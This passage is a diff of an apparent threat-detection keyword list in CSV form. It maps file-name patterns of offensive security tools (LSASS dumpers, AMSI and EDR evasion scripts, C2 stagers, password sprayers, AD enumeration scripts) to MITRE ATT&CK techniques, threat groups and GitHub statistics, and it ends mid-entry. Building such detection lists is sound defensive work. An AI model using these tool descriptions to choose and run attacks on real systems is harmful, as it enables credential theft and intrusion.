-"*Outflank-Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*Outflank-Dumpert.*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*outflanknl/Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Out-CompressedDLL.ps1*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Out-DnsTxt.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Outflank-Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Outflank-Dumpert.*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*outflanknl/Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*outflanknl/EvilClippy*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" "*outflanknl/Net-GPPPassword*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" -"*outflanknl/Recon-AD*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*outflanknl/Recon-AD*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*outflanknl/SharpHide*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*outflanknl/Spray-AD*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*outflanknl/WdToggle*","offensive_tool_keyword","cobaltstrike","s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" -"*Outflank-Recon-AD*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*OutlookEmailAbuse.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*Out-Minidump.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Outflank-Recon-AD*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*OutlookEmailAbuse.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Out-Minidump.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Out-ObfuscatedAst.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Out-ObfuscatedStringCommand.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Out-ObfuscatedTokenCommand.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" -"*output*kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*Output.aes.zip*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*output*kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Output.aes.zip*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*output/AccountsWithSPN.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AdminAccessComputers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllDomainControllers.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" @@ -14460,44 +14625,45 @@ "*output/UsersPasswordMustChange.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/UsersPasswordNotChanged.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/WinRMMachines.txt*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" -"*Out-RundllCommand*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*OverrideLHOST 360.com*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*Out-RundllCommand*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*OverrideLHOST 360.com*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*owa */autodiscover/autodiscover.xml* --recon*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*OWASP*Amass*","offensive_tool_keyword","amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","N/A","Information Gathering","https://github.com/caffix/amass","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*OwnerPersist-POST.*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*OwnerPersist-POST.*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" "*Ox-Bruter.pl*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*-p 